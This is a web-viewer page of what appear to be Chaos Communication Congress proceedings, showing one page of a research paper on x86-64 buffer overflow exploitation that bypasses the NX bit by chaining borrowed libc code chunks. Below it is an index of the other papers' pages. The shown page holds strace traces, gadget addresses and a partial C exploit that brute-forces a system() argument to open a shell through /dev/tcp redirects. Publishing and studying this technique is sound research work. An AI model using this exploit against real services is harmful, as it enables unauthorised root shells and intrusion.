Proceedings

More documents

Recommendations

Info

| 118 7 AUTOMATED EXPLOITATION 15 When running the exploit client-automatic, an attached strace shows that the right functions are executed in the right order. This time the system-calls are actually shown in the trace-log but thats OK since the triggered libc calls will eventually call the corresponding system calls. linux:˜ # strace -i -f -p 7020 Process 7020 attached - interrupt to quit [ 2aaaaac7bd72] accept(3, 0, NULL) = 4 [ 2aaaaac4fe4b] clone(Process 7227 attached child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaaade8b90) = 7227 [pid 7020] [ 2aaaaac6ed12] close(4) = 0 [pid 7020] [ 2aaaaac7bd72] accept(3, [pid 7227] [ 2aaaaac6ee22] write(4, "OF Server 1.0\n", 14) = 14 [pid 7227] [ 2aaaaac6ed92] read(4, "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"..., 4096) = 4096 [pid 7227] [ 2aaaaac6ee22] write(4, "OK\n", 3) = 3 [pid 7227] [ 2aaaaac50bd9] setuid(0) = 0 [pid 7227] [ 2aaaaac4fe4b] clone(Process 7228 attached child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaaade8b90) = 7228 [pid 7227] [ 2aaaaac50e7d] setresuid(1, 2, 3) = 0 [pid 7227] [ 2aaaaac6ed12] close(42) = -1 EBADF (Bad file descriptor) [pid 7227] [ 2aaaaac78579] munmap(0x2aaaaaac2000, 4096) = 0 [pid 7227] [ 2aaaaac500fa] exit_group(1) = ? Process 7227 detached [pid 7020] [ 2aaaaac7bd72] 0, NULL) = ? ERESTARTSYS (To be restarted) [pid 7020] [ 2aaaaac7bd72] --- SIGCHLD (Child exited) @ 0 (0) --- [pid 7020] [ 2aaaaac4f6d4] wait4(-1, NULL, WNOHANG, NULL) = 7227 [pid 7020] [ 2aaaaac4f6d4] wait4(-1, NULL, WNOHANG, NULL) = -1 ECHILD (No child processes) [pid 7020] [ 2aaaaabeff09] rt_sigreturn(0xffffffffffffffff) = 43 [pid 7020] [ 2aaaaac7bd72] accept(3, [pid 7228] [ 2aaaaac50e7d] setresuid(1, 2, 3) = 0 [pid 7228] [ 2aaaaac6ed12] close(42) = -1 EBADF (Bad file descriptor) [pid 7228] [ 2aaaaac78579] munmap(0x2aaaaaac2000, 4096) = 0 [pid 7228] [ 2aaaaac500fa] exit_group(1) = ? Process 7228 detached Everything worked as expected, even the fork(2) which can be seen by the the spawned process. I don’t want to hide the fact that all the exploits send 0-bytes across the wire. If the target process introduces strcpy(3) calls this might be problematic since 0 is the string terminator. However, deeper research might allow to remove the 0-bytes and most overflows today don’t happen anymore due to stupid strcpy(3) calls. Indeed even most of them accept 0 bytes since most overflows happen due to integer miscalculation of length fields today. Eventually we want to generate a shellcode which executes a shell. We still use the same vulnerable server program. But this time we generate a stack which also calls the system(3) function instead of the dummy calls from the last example. To show that its still a calling sequence and not just a single function call, the UID is set to the wwwrun user via the setuid(3) function call. The problem with a call to system(3) is that it expects a pointer argument. The code generator however is not clever enough 4 to find out where the command is located. Thats why we need to brute force the argument for system(3) within the exploit. As with common old-school exploits, we can use NOP’s to increase the steps during brute force. We know that the command string is located on the stack. The space character ’ ’ serves very well as a NOP since our NOP will be a NOP to the system(3) argument, e.g. we can pass "/bin/sh" or " /bin/sh" to system(3). NO-NX 4Not yet clever enough. It is however possible to use ptrace(2) to look for the address of certain strings in the target process address space.
DER HAMMER: X86-64 UND DAS UM-SCHIFFEN DES NX BITS 7 AUTOMATED EXPLOITATION 16 linux:$ ps aux|grep server root 7207 0.0 0.0 2404 368 tty1 S+ 15:09 0:00 ./server user@linux:> cat calls-shell 30 setuid /bin/sh system linux:$ ./find -p 7207 < calls-shell 7276: [2aaaaaaab000-2aaaaaac1000] 0x2aaaaaaab000-0x2aaaaaac1000 /lib64/ld-2.3.4.so pop %rsi; retq @0x2aaaaaaabdfd /lib64/ld-2.3.4.so pop %rdi; retq @0x2aaaaaaac0a9 /lib64/ld-2.3.4.so 7276: [2aaaaabc2000-2aaaaabc4000] 0x2aaaaabc2000-0x2aaaaabc4000 /lib64/libdl.so.2 7276: [2aaaaacc5000-2aaaaade2000] 0x2aaaaacc5000-0x2aaaaade2000 /lib64/tls/libc.so.6 pop %r8; retq @0x2aaaaacf82c3 /lib64/tls/libc.so.6 pop %rdx; retq @0x2aaaaad890f5 /lib64/tls/libc.so.6 Target process 7207, offset 0 Target process 7207, offset 0 libc_offset=1060864 Target process 7207, offset 1060864 Target process 7207, offset 1060864 pop %rdi; retq 0x2aaaaaaac0a9 0 /lib64/ld-2.3.4.so pop %rsi; retq 0x2aaaaaaabdfd 0 /lib64/ld-2.3.4.so pop %rdx; retq 0x2aaaaad890f5 1060864 /lib64/tls/libc.so.6 pop %rcx; retq (nil) 0 (null) pop %r8; retq 0x2aaaaacf82c3 1060864 /lib64/tls/libc.so.6 pop %r9; retq (nil) 0 (null) u_int64_t chunks[] = { 0x2aaaaaaac0a9, // pop %rdi; retq,/lib64/ld-2.3.4.so 0x1e, 0x2aaaaac50bc0, // setuid }; linux:$ 0x2aaaaaaac0a9, // pop %rdi; retq,/lib64/ld-2.3.4.so , 0x2aaaaabfb290, // system The fourth entry of the chunks[] array has to hold the address of the command and has to be brute forced. The exploit function looks like this: 1 void exploit(const char *host) 2 { 3 int sock = -1; 4 char trigger[4096]; 5 size_t tlen = sizeof(trigger); 6 struct t_stack { 7 char buf[1024]; 8 u_int64_t rbx; 9 u_int64_t code[6]; 10 char cmd[512]; 11 } __attribute__ ((packed)) server_stack; 12 u_int64_t chunks[] = { 13 0x2aaaaaaac0a9, // pop %rdi; retq,/lib64/ld-2.3.4.so 14 0x1e, 15 0x2aaaaac50bc0, // setuid 16 0x2aaaaaaac0a9, // pop %rdi; retq,/lib64/ld-2.3.4.so 17 0, // to be brute forced 18 0x2aaaaabfb290, // system 19 }; 20 u_int64_t stack; 21 char *cmd = " " // ˜80 NOPs 22 "sh < /dev/tcp/127.0.0.1/3128 > /dev/tcp/127.0.0.1/8080;"; 23 memset(server_stack.buf, ’X’, sizeof(server_stack.buf)); 24 server_stack.rbx = 0x00002aaaaabfb290; 25 strcpy(server_stack.cmd, cmd); 26 for (stack = 0x7ffffffeb000; stack < 0x800000000000; stack += 70) { 27 printf("0x%08lx\r", stack); 28 chunks[4] = stack; 29 memcpy(server_stack.code, chunks, sizeof(server_stack.code)); 30 if ((sock = tcp_connect(host, 1234)) < 0) 31 die("tcp_connect"); NO-NX 119 |
Page 2 and 3:
| 2
Page 5 and 6:
22. Chaos Communication Congress Pr
Page 7 and 8:
REPORTS 7 5 Thesis on Informational
Page 9 and 10:
10 5 Thesis on Informational- Cogni
Page 11 and 12:
5 THESIS ON INFORMATIONAL-COGNITIVE
Page 13 and 14:
Page 15 and 16:
Page 17:
Page 20 and 21:
UQBTng: a tool capable of automatic
Page 22 and 23:
IV. UQBT MODIFICATIONS A. Summary A
Page 24 and 25:
• if LHS of A is exactly sem str,
Page 27 and 28:
Advanced Buffer Overflow Methods [o
Page 29 and 30:
ADVANCED BUFFER OVERFLOW METHODS #i
Page 31 and 32:
ADVANCED BUFFER OVERFLOW METHODS 0x
Page 33 and 34:
ADVANCED BUFFER OVERFLOW METHODS in
Page 35:
ADVANCED BUFFER OVERFLOW METHODS }
Page 38 and 39:
| 34 Eine Führung in das europäis
Page 40 and 41:
| 36 Die kryptische Kennung 10 eine
Page 42 and 43:
| 38 senvertreter angewiesen. Die
Page 44 and 45:
| 40 Anonymous Data Broadcasting by
Page 46 and 47:
| 42 operate, consider the setting,
Page 48 and 49:
| 44 Figure 1: Anonymous data broad
Page 51 and 52:
Autodafé: An Act of Software Tortu
Page 53 and 54:
AUTODAFE - AN ACT OF SOFTWARE TORTU
Page 55 and 56:
Page 57 and 58:
Page 59 and 60:
Page 61 and 62:
Bad TRIPs What the WTO Treaty did i
Page 63 and 64:
BAD TRIPS The TRIPS is especially h
Page 65:
BAD TRIPS Extension of the transiti
Page 68 and 69:
| 64 Collateral Damage Consequences
Page 70 and 71:
| 66 If one considers a DNSBL listi
Page 72 and 73: | 68 • A number of sites do not h
Page 74 and 75: | 70 to use other mailing software.
Page 76 and 77: | 72 These kinds of checks tend to
Page 79 and 80: COMPLETE Hard Disk Encryption with
Page 81 and 82: COMPLETE HARD DISK ENCRYPTION WITH
Page 105: COMPLETE HARD DISK ENCRYPTION WITH
Page 108 and 109: | 104 x86-64 buffer overflow exploi
Page 110 and 111: | 106 3 ELF64 LAYOUT AND X86-64 EXE
Page 112 and 113: | 108 4 THE BORROWED CODE CHUNKS TE
Page 114 and 115: | 110 5 AND DOES THIS REALLY WORK?
Page 116 and 117: | 112 6 SINGLE WRITE EXPLOITS 9 48
Page 118 and 119: | 114 6 SINGLE WRITE EXPLOITS 11 34
Page 120 and 121: | 116 7 AUTOMATED EXPLOITATION 13 A
Page 124 and 125: | 120 8 RELATED WORK 17 32 read(soc
Page 126 and 127: | 122 11 CREDITS 19 11 Credits Than
Page 129 and 130: Developing Intelligent Search Engin
Page 131 and 132: DEVELOPING INTELLIGENT SEARCH ENGIN
Page 133 and 134: DEVELOPING INTELLIGENT SEARCH ENGIN
Page 135 and 136: Digital Identity and the Ghost in t
Page 137 and 138: DIGITAL IDENTITY AND THE GHOST IN T
Page 145: DIGITAL IDENTITY AND THE GHOST IN T
Page 148 and 149: | 144
Page 150 and 151: | 146
Page 153 and 154: Esperanto, die internationale Sprac
Page 155 and 156: ESPERANTO, DIE INTERNATIONALE SPRAC
Page 157 and 158: ESPERANTO, DIE INTERNATIONALE SPRAC
Page 159 and 160: Fair Code Free/Open Source Software
Page 161 and 162: FAIR CODE 2. Von Digital Divide zu
Page 163 and 164: FAIR CODE ökonomisch schlecht gest
Page 165 and 166: FAIR CODE menschliches Verhalten re
Page 167: FAIR CODE gewährleistet, und nur d
Page 170 and 171: ��
Page 172 and 173:
| 168 ��
Page 174 and 175:
| 170 ��
Page 176 and 177:
| 172 ��
Page 178 and 179:
| 174 ��
Page 180 and 181:
| 176 ��
Page 183 and 184:
Fuzzing Breaking software in an aut
Page 185 and 186:
FUZZING or protocol and fuzzing fra
Page 187 and 188:
FUZZING #define SOME_MAX 4096 if (y
Page 189 and 190:
Geometrie ohne Punkte, Geraden & Eb
Page 191 and 192:
GEOMETRIE OHNE PUNKTE, GERADEN & EB
Page 193:
GEOMETRIE OHNE PUNKTE, GERADEN & EB
Page 196 and 197:
| 192
Page 198 and 199:
| 194
Page 200 and 201:
| 196
Page 203 and 204:
Hacking OpenWRT Felix Fietkau 199 |
Page 205 and 206:
HACKING OPENWRT 1 Introduction to O
Page 207 and 208:
HACKING OPENWRT 3.2 Makefile This f
Page 209 and 210:
HACKING OPENWRT If your package is
Page 211 and 212:
HACKING OPENWRT 4.2 toolchain/ tool
Page 213 and 214:
HACKING OPENWRT To add a new platfo
Page 215 and 216:
Hopalong Casualty On automated vide
Page 217 and 218:
HOPALONG CASUALTY 2 Intro to Visual
Page 219 and 220:
HOPALONG CASUALTY Appearance As hum
Page 221 and 222:
HOPALONG CASUALTY A thorough review
Page 223 and 224:
Hosting a Hacking Challenge - CTF-s
Page 225 and 226:
HOSTING A HACKING CHALLENGE - CTF-S
Page 227 and 228:
Page 229:
Page 232 and 233:
| 228 1 Introduction Intrusion Dete
Page 234 and 235:
| 230 • Changing file owner / gro
Page 236 and 237:
| 232 Figure 2: Simple correlation
Page 239 and 240:
Lyrical I Abschluss des CCC-Poesie-
Page 241 and 242:
Magnetic Stripe Technology Joseph B
Page 243 and 244:
MAGNETIC STRIPE TECHNOLOGY black re
Page 245 and 246:
MAGNETIC STRIPE TECHNOLOGY My curre
Page 247 and 248:
MAGNETIC STRIPE TECHNOLOGY MetroCar
Page 249 and 250:
��
Page 251 and 252:
Code Listing (dmsb.c) ��
Page 253 and 254:
Memory allocator security Yves Youn
Page 255 and 256:
MEMORY ALLOCATOR SECURITY 251 |
Page 257 and 258:
MEMORY ALLOCATOR SECURITY 253 |
Page 259 and 260:
Message generation at the info laye
Page 261 and 262:
MESSAGE GENERATION AT THE INFO LAYE
Page 263 and 264:
Page 265 and 266:
Page 267 and 268:
Page 269:
Page 272 and 273:
| 268 Abstract Open Source, EU Fund
Page 274 and 275:
| 270 lines of code x1e5 1.8 1.6 1.
Page 276 and 277:
| 272 cooperation. Getting the new
Page 278 and 279:
| 274 PyPy - The new Python Impleme
Page 280 and 281:
| 276 performs abstract interpretat
Page 282 and 283:
| 278 adding short cuts for some co
Page 284 and 285:
| 280
Page 286 and 287:
| 282
Page 288 and 289:
| 284
Page 290 and 291:
| 286
Page 292 and 293:
| 288
Page 294 and 295:
| 290
Page 296 and 297:
| 292
Page 298 and 299:
| 294 Die Risiken der Nanotechnik N
Page 300 and 301:
| 296 Neue Materialien, einer der P
Page 302 and 303:
| 298 wahrscheinlich nicht ausreich
Page 304 and 305:
| 300 „State of the Future 2005
Page 307 and 308:
The Web according to W3C How to tur
Page 309 and 310:
THE WEB ACCORDING TO W3C 305 |
Page 311 and 312:
THE WEB ACCORDING TO W3C 307 |
Page 313:
THE WEB ACCORDING TO W3C our proces
Page 316 and 317:
| 312 Transparenz der Verantwortung
Page 318 and 319:
| 314 Transparenz der Verantwortung
Page 320 and 321:
| 316 (6) Wird dem Betroffenen kein
Page 322 and 323:
| 318 „anonymes Staatshandeln“
Page 324 and 325:
| 320 Die Einschränkungen der Grun
Page 326 and 327:
| 322 11 wie es insbesondere an Hei
Page 328 and 329:
��
Page 330 and 331:
��
Page 332 and 333:
| 328 ��
Page 335 and 336:
Wargames - Hacker Spielen Männlich
Page 337 and 338:
WARGAMES - HACKER SPIELEN 333 |
Page 339 and 340:
Page 341 and 342:
Page 343 and 344:
Page 345 and 346:
Page 347 and 348:
Page 349 and 350:
Page 351 and 352:
Page 353 and 354:
Page 355 and 356:
Was ist technisches Wissen? Philoso
Page 357 and 358:
WAS IST TECHNISCHES WISSEN? ��
Page 359 and 360:
Page 361 and 362:
Page 363 and 364:
Page 365 and 366:
Page 367 and 368:
��
Page 369 and 370:
��
Page 371 and 372:
Page 373:
Page 376 and 377:
| 372 ��
Page 378 and 379:
��
Page 380 and 381:
��
Page 382 and 383:
| 378
Page 384 and 385:
| 380
Page 386 and 387:
| 382
Page 388 and 389:
| 384
Page 390 and 391:
| 386
Page 392 and 393:
| 388
Page 394:
| 390
show all

Proceedings

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?